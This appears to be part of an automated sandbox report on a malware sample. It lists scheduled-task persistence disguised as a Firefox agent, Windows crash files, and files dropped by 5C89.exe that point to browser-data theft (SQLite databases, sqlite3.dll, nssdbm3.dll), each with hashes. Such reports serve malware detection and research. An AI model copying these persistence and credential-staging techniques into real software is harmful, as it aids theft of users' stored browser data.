                                                                                  • Excluded domains from analysis (whitelisted): displaycatalog-rp-uswest.md.mp.microsoft.com.akadns.net, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, onedsblobprdwus17.westus.cloudapp.azure.com, wus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, arc.msn.com, ris.api.iris.microsoft.com, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, blobcollector.events.data.trafficmanager.net, consumer-displaycatalogrp-aks2aks-uswest.md.mp.microsoft.com.akadns.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, microsoft.com, displaycatalog-rp.md.mp.microsoft.com.akadns.net
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report creation exceeded maximum time and may have missing behavior and disassembly information.
                                                                                  • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                  • Report size exceeded maximum capacity and may have missing network information.
                                                                                  • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtEnumerateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenFile calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.

                                                                                  Simulations

                                                                                  Behavior and APIs

                                                                                  TimeTypeDescription
                                                                                  09:24:58Task SchedulerRun new task: Firefox Default Browser Agent 5309D4B020312F94 path: C:\Users\user\AppData\Roaming\rifsswe
                                                                                  09:25:10API Interceptor1x Sleep call for process: DB31.exe modified
                                                                                  09:25:22API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                  09:25:22API Interceptor8x Sleep call for process: svchost.exe modified
                                                                                  09:25:58API Interceptor6x Sleep call for process: 5C89.exe modified
                                                                                  09:25:58API Interceptor550x Sleep call for process: mjlooy.exe modified
                                                                                  09:25:59Task SchedulerRun new task: mjlooy.exe path: C:\Users\user\AppData\Local\Temp\82aa4a6c48\mjlooy.exe
                                                                                  09:26:19API Interceptor12x Sleep call for process: F65C.exe modified

                                                                                  Joe Sandbox View / Context

                                                                                  IPs

                                                                                  No context

                                                                                  Domains

                                                                                  No context

                                                                                  ASN

                                                                                  No context

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_9334.exe_a5565ef87128e315374a33b3a55a1296f2841c6_94cfe485_18fbbefb\Report.wer
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):65536
                                                                                  Entropy (8bit):0.8127421426857177
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:wy4PvFoo+L8QJYOQoJ7R3V6tpXIQcQec6tycEfcw32+HbHg/8BRTf3o8Fa9iVfOn:9gvyV8Qh8HQ0lLjIq/u7snS274Itr
                                                                                  MD5:6F6811213DC38FF2AFDB04F3CD55FF1A
                                                                                  SHA1:64F43638AEC6C761650F890FF2CD403FA3D6DAC5
                                                                                  SHA-256:E4404798C093AFDD465AADFACD5D3127BEE372A8939F9C3BFBF3202692A5A8FD
                                                                                  SHA-512:5E8A8ECFC05DC3A0116077417A3BE790C38939CD383C817AE5FDD349BA2406CBFCD272BFB753205D84F25BDF689F72BB74FF013561A43C4DA18372E923DD1181
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.B.E.X.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.6.6.2.2.3.0.9.4.4.9.0.0.8.7.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.6.6.2.2.3.2.0.0.4.2.7.2.2.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.8.4.d.d.1.c.7.e.-.4.7.e.3.-.4.3.b.a.-.8.5.f.1.-.a.a.c.4.e.4.5.7.7.1.f.f.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.3.f.5.b.3.d.3.3.-.c.7.8.2.-.4.4.f.f.-.9.6.5.e.-.f.5.8.7.d.e.3.5.d.8.6.9.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.9.3.3.4...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.b.b.c.-.0.0.0.1.-.0.0.1.b.-.e.0.a.e.-.a.a.3.9.2.0.0.9.d.8.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.3.a.c.c.6.9.e.a.a.d.b.5.b.5.c.c.2.7.e.9.2.7.f.3.0.a.c.e.0.5.4.e.0.0.0.0.2.9.0.1.!.0.0.0.0.5.9.9.5.a.e.9.d.0.2.4.7.0.3.6.c.c.6.d.3.e.a.7.4.1.e.7.5.0.4.c.9.1.3.f.1.f.b.7.6.!.9.3.3.4...e.x.e.....T.a.r.g.e.t.A.p.p.V.e.r.=.2.0.2.1././.1.1././.1.2.:.
                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER180D.tmp.dmp
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:Mini DuMP crash report, 14 streams, Fri Jan 14 08:25:13 2022, 0x1205a4 type
                                                                                  Category:dropped
                                                                                  Size (bytes):36668
                                                                                  Entropy (8bit):2.119769547883536
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:/75VjONBOeh0kcSLWgKjM2Er8TDjRfvNeUkkt:TeK3lnt
                                                                                  MD5:2C6138896A76E4B6272E90D3BDA15F56
                                                                                  SHA1:D5DB3E974F8D4C01F98D71342BDB70004D9757DC
                                                                                  SHA-256:0C14C62E9BD24CABEAC04A5C10614CCE9E66E3CDC8040F2C60A465CE5311FBEE
                                                                                  SHA-512:9FA50441E67EC793DD839C1A474B427E372633817234BB645F04A41B0F43549057D4FAA0711C215081DC5FE4CDA00BE83CAF0DEBCF305D4126B420D6C75A3102
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: MDMP....... .......i3.a........................................z%..........T.......8...........T................z..........H...........4....................................................................U...........B..............GenuineIntelW...........T...........]3.a.............................0..................W... .E.u.r.o.p.e. .S.t.a.n.d.a.r.d. .T.i.m.e.......................................W... .E.u.r.o.p.e. .D.a.y.l.i.g.h.t. .T.i.m.e.......................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER27DD.tmp.WERInternalMetadata.xml
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):8392
                                                                                  Entropy (8bit):3.7000265245349317
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Rrl7r3GLNiaZ6h6YrQSU6I6gmfSRSy/+pDp89bxvIcsfMbm:RrlsNiM6h6Y8SUQgmfSRSQxvIvft
                                                                                  MD5:9728EFE3FCD1F2EDF2455C6C24A0E3A8
                                                                                  SHA1:20CC9CA877B4F4FBE84ADFCF86985336F211DA16
                                                                                  SHA-256:34E3320BCDFE5FC9DA5D259788C15BBC12D7A9EA8CF3EC9ED851E51C27C9DF31
                                                                                  SHA-512:7FA47509ECF9AF82644E844110B79883B40CDAC1A881A778500D8A6A299176BC2D76FCE9DAD29BF898C4991A05A527F4912AE4874FC23CBA83CC53310BF268C2
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: ..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.7.1.0.0.<./.P.i.d.>.......
                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WER2B39.tmp.xml
                                                                                  Process:C:\Windows\SysWOW64\WerFault.exe
                                                                                  File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):4685
                                                                                  Entropy (8bit):4.47401591312699
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:cvIwSD8zsvJgtWI9YGWSC8B+b8fm8M4JUq8qF+LmHV+q8voq8XDt3efd:uITfRLHSNLJUrAVKoDDt3efd
                                                                                  MD5:500A558B8AF1D586EF5471DEB82D8602
                                                                                  SHA1:DF7939F10AAB10431EEC217AF7C43EB68C4AD4DD
                                                                                  SHA-256:75C4307E165914D4F166FD85510231B7E5B0AA71E462E664DF1D9021D0508540
                                                                                  SHA-512:0332FE01BE4694D34FFC2259FB9E4CC46352B9FA2983C26198776F498B174E10C0F26CA5E2AFD44443607C8A50C5C114CDFD5502580FC6C1BFD6D855D187BD23
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: <?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1341695" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..
                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFB48.tmp.csv
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):52752
                                                                                  Entropy (8bit):3.033752492589164
                                                                                  Encrypted:false
                                                                                  SSDEEP:768:Z8Hq4E/6LytGTdG/xEaa6QZ7uw7qO2Ivta3ou1kfEvdO25:Z8Hqb6LvTdG/xyZ7urBzou1kfEvdp5
                                                                                  MD5:41B4C10832B6C2E2EDBC4603B5751BCC
                                                                                  SHA1:CE1FC1463DDFF7A19F40D09C25839C3A1424A0AA
                                                                                  SHA-256:9E6AD05DA0DA5BCA00A6EE12209009741A352DAA4E78007CFB0AA97CC6A81A03
                                                                                  SHA-512:88A36BE9A669C3D3CDF6212651DE769AF93921EABE0F46D11B9F29A46770B1C4D33595D14931D6FAE3D52D3B7B447F34AEABFB80249ECBB76669C997854843B7
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: I.m.a.g.e.N.a.m.e.,.U.n.i.q.u.e.P.r.o.c.e.s.s.I.d.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.,.W.o.r.k.i.n.g.S.e.t.P.r.i.v.a.t.e.S.i.z.e.,.H.a.r.d.F.a.u.l.t.C.o.u.n.t.,.N.u.m.b.e.r.O.f.T.h.r.e.a.d.s.H.i.g.h.W.a.t.e.r.m.a.r.k.,.C.y.c.l.e.T.i.m.e.,.C.r.e.a.t.e.T.i.m.e.,.U.s.e.r.T.i.m.e.,.K.e.r.n.e.l.T.i.m.e.,.B.a.s.e.P.r.i.o.r.i.t.y.,.P.e.a.k.V.i.r.t.u.a.l.S.i.z.e.,.V.i.r.t.u.a.l.S.i.z.e.,.P.a.g.e.F.a.u.l.t.C.o.u.n.t.,.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.P.e.a.k.W.o.r.k.i.n.g.S.e.t.S.i.z.e.,.Q.u.o.t.a.P.e.a.k.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.P.e.a.k.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.Q.u.o.t.a.N.o.n.P.a.g.e.d.P.o.o.l.U.s.a.g.e.,.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.e.a.k.P.a.g.e.f.i.l.e.U.s.a.g.e.,.P.r.i.v.a.t.e.P.a.g.e.C.o.u.n.t.,.R.e.a.d.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.W.r.i.t.e.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.O.t.h.e.r.O.p.e.r.a.t.i.o.n.C.o.u.n.t.,.R.e.a.d.T.r.a.n.s.f.e.r.C.o.u.n.t.,.W.r.i.t.e.T.r.a.n.s.f.e.r.C.o.u.n.t.,.O.t.h.e.r.T.r.a.n.s.f.e.r.C.o.u.n.t.,.H.a.n.
                                                                                  C:\ProgramData\Microsoft\Windows\WER\Temp\WERFF8F.tmp.txt
                                                                                  Process:C:\Windows\System32\svchost.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):13340
                                                                                  Entropy (8bit):2.6951624028803427
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:9GiZYWUw0pVsYsaYtWjhJpyHQUYEZfRtriojXtt7wOxn07bja/8y/EcxINT3:9jZD32nh4dx6bja/8y/VuNT3
                                                                                  MD5:32C5799696111CD15DF44F24AC2EEF77
                                                                                  SHA1:4FD6DB5108A818C1DC4FD6EED09C6CF85FD8401E
                                                                                  SHA-256:64AB345C0B68D01374BB3231B456712BDD34BAEE43B23B78A6962F9C5B1AA7DD
                                                                                  SHA-512:AA873092EB6545AA15C123617C353509E2C4E40AC93AF706C39BA91587CBA79F6F42F7EA8AE8491950B4121A22CEF0F22F64D11853A40CF5E4C4E5C4A972E332
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                                                                                  C:\Users\user\AppData\LocalLow\1xVPfvJcrg
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\LocalLow\RYwTiizs2t
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:96:I3sa9uKnadsdUDitMkMC1mBKC7g1HFp/GeICEjWTPeKeWbS8pz/YLcs+P+qigSz4:I3rHdMHGTPVbSYgbCP46w/1Vumq
                                                                                  MD5:72A43D390E478BA9664F03951692D109
                                                                                  SHA1:482FE43725D7A1614F6E24429E455CD0A920DF7C
                                                                                  SHA-256:593D9DE27A8CA63553E9460E03FD190DCADD2B96BF63B438B4A92CB05A4D711C
                                                                                  SHA-512:FF2777DCDDC72561CF694E2347C5755F19A13D4AC2C1A80C74ADEBB1436C2987DFA0CFBE4BAFD8F853281B24CA03ED708BA3400F2144A5EB3F333CC255DAC7CE
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: SQLite format 3......@ .......$..................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\LocalLow\frAQBc8Wsa
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:48:2i3nBA+IIY1PJzr9URCVE9V8MX0D0HSFlNUfAlGuGYFoNSs8LKvUf9KVyJ7hU:pBCJyC2V8MZyFl8AlG4oNFeymw
                                                                                  MD5:81DB1710BB13DA3343FC0DF9F00BE49F
                                                                                  SHA1:9B1F17E936D28684FFDFA962340C8872512270BB
                                                                                  SHA-256:9F37C9EAF023F2308AF24F412CBD850330C4EF476A3F2E2078A95E38D0FACABB
                                                                                  SHA-512:CF92D6C3109DAB31EF028724F21BAB120CF2F08F7139E55100292B266A363E579D14507F1865D5901E4B485947BE22574D1DBA815DE2886C118739C3370801F1
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: SQLite format 3......@ ..........................................................................C.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\LocalLow\rQF69AzBla
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBoe9H6pf1H1oNQ:T5LLOpEO5J/Kn7U1uBobfvoNQ
                                                                                  MD5:A7FE10DA330AD03BF22DC9AC76BBB3E4
                                                                                  SHA1:1805CB7A2208BAEFF71DCB3FE32DB0CC935CF803
                                                                                  SHA-256:8D6B84A96429B5C672838BF431A47EC59655E561EBFBB4E63B46351D10A7AAD8
                                                                                  SHA-512:1DBE27AED6E1E98E9F82AC1F5B774ACB6F3A773BEB17B66C2FB7B89D12AC87A6D5B716EF844678A5417F30EE8855224A8686A135876AB4C0561B3C6059E635C7
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                  C:\Users\user\AppData\LocalLow\sG8rM8v\dI3hX2r.zip
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:Zip archive data, at least v2.0 to extract
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:49152:tiGLaX5/cgbRETlc0EqgSVAx07XZiEi4qiefeEJGt5ygL0+6/qax:t9OX9alwJSVP1fnefekGt5CP
                                                                                  MD5:1117CD347D09C43C1F2079439056ADA3
                                                                                  SHA1:93C2CE5FC4924314318554E131CFBCD119F01AB6
                                                                                  SHA-256:4CFADA7EB51A6C0CB26283F9C86784B2B2587C59C46A5D3DC0F06CAD2C55EE97
                                                                                  SHA-512:FC3F85B50176C0F96898B7D744370E2FF0AA2024203B936EB1465304C1C7A56E1AC078F3FDF751F4384536602F997E745BFFF97F1D8FF2288526883185C08FAF
                                                                                  Malicious:false
                                                                                  Reputation:unknown
                                                                                  Preview: PK.........znN<..{r....i......nssdbm3.dll...|...8...N..Y..6.$J.....$1...D .a.....jL.V..C...N.;....}./............$...Z,T.R.qc...Ec.=................;..{..s....p.`..A.?M.....W!.....a..?N...~e.A..W.o.....[.}...,...;.+\....Jw.|...k.......<yR.^.E.o.nxs.c...=V....,..F....cu.....w.O..[..u.{..<.w....7P...{..K~..E..w...c...z^..[Z....6.G.V.2..+.n4......1M.......w{f..nJL..{. d......M..+.. ......./.)..$X!......L..K.`.M...w.I..LA8r.IX...r...87..}........<.].r.....TWm......b6/._....a..W.lB...3.n.._...j....o.Mz.._Q........8....K.*...........gr..L..*H...v....6[*...4I...{.1g..<..>M..$G.&Y........-.....O..9\...,t..W.m.X ..Y.3.*...S<#}.".>.0RBg,...lh.s..o.....r.p8...)..3..K.v....ds.n3.+]....+....krMu._.Y\..../8T......&.BC.".u..;..e.k u$......~`.{.!.M...\W.Y.37+nQ.Z.*...3\G..5d....Z.hVL..Z.|k.5...XF.Y..lVVW..C..|.....b..\.Z...m. ..0...P.F8{].U.p..RW,n...MM.....s..._@..>Q.. ...N.>.T?WM....)9B.............mVW.......b.6{..|!......O....M....>.>.$\.%..L.zF.l...3
                                                                                  C:\Users\user\AppData\LocalLow\sqlite3.dll
                                                                                  Process:C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):0
                                                                                  Entropy (8bit):0.0
                                                                                  Encrypted:false
                                                                                  SSDEEP:24576:BJDwWdxW2SBNTjlY24eJoyGttl3+FZVpsq/2W:BJDvx0BY24eJoyctl3+FTX
                                                                                  MD5:F964811B68F9F1487C2B41E1AEF576CE
                                                                                  SHA1:B423959793F14B1416BC3B7051BED58A1034025F
                                                                                  SHA-256:83BC57DCF282264F2B00C21CE0339EAC20FCB7401F7C5472C0CD0C014844E5F7
                                                                                  SHA-512:565B1A7291C6FCB63205907FCD9E72FC2E11CA945AFC4468C378EDBA882E2F314C2AC21A7263880FF7D4B84C2A1678024C1AC9971AC1C1DE2BFA4248EC0F98C4
                                                                                  Malicious:false
                                                                                  Antivirus:
                                                                                  • Antivirus: Metadefender, Detection: 0%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                  Reputation:unknown
                                                                                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....t\...........!.....Z...................p.....a.......................................... .......................... ......H.... .......................0...3...................................................................................text...XX.......Z..................`.P`.data........p.......`..............@.`..rdata........... ...|..............@.`@.bss....(.............................`..edata... ......."..................@.0@.idata..H...........................@.0..CRT....,...........................@.0..tls.... ...........................@.0..rsrc........ ......................@.0..reloc...3...0...4..................@.0B/4...........p......................@.@B/19................................@..B/31.......... ......................@..B/45..........@......................@..B/57..........`......................@.0B/70.....i....p..........
                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\F65C.exe.log
                                                                                  Process:C:\Users\user\AppData\Local\Temp\F65C.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):700
                                                                                  Entropy (8bit):5.346524082657112
                                                                                  Encrypted:false
                                                                                  SSDEEP:12:Q3La/KDLI4MWuPk21OKbbDLI4MWuPJKiUrRZ9I0ZKhat/DLI4M/DLI4M0kvoDLIw:ML9E4Ks2wKDE4KhK3VZ9pKhgLE4qE4jv
                                                                                  MD5:65CF801545098D915A06D8318D296A01
                                                                                  SHA1:456149D5142C75C4CF74D4A11FF400F68315EBD0
                                                                                  SHA-256:32E502D76DBE4F89AEE586A740F8D1CBC112AA4A14D43B9914C785550CCA130F
                                                                                  SHA-512:4D1FF469B62EB5C917053418745CCE4280052BAEF9371CAFA5DA13140A16A7DE949DD1581395FF838A790FFEBF85C6FC969A93CC5FF2EEAB8C6C4A9B4F1D552D
                                                                                  Malicious:true
                                                                                  Reputation:unknown
                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..2,"Microsoft.CSharp, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Dynamic, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..
                                                                                  C:\Users\user\AppData\Local\Temp\5C89.exe
                                                                                  Process:C:\Windows\explorer.exe
                                                                                  File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                  Category:dropped
                                                                                  Size (bytes):905216
                                                                                  Entropy (8bit):7.399713113456654
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:KoXpNqySLyUDd48BpBIfj2ucA0ZeEbVkw+lMbguodE1z0oLxCZJ9tzj8kpcunn:KoO9FDZpBIMR/4Mzv2Jnp
                                                                                  MD5:852D86F5BC34BF4AF7FA89C60569DF13
                                                                                  SHA1:C961CCD088A7D928613B6DF900814789694BE0AE
                                                                                  SHA-256:2EAA2A4D6C975C73DCBF251EA9343C4E76BDEE4C5DDA8D4C7074078BE4D7FC6F
                                                                                  SHA-512:B66B83D619A242561B2A7A7364428A554BB72CCC64C3AC3F28FC7C73EFE95C7F9F3AC0401116AE6F7B41B960C323CC3B7ADAC782450013129D9DEC49A81DCEC7
                                                                                  Malicious:true
                                                                                  Antivirus:
                                                                                  • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                  • Antivirus: Metadefender, Detection: 34%, Browse
                                                                                  • Antivirus: ReversingLabs, Detection: 77%
                                                                                  Reputation:unknown
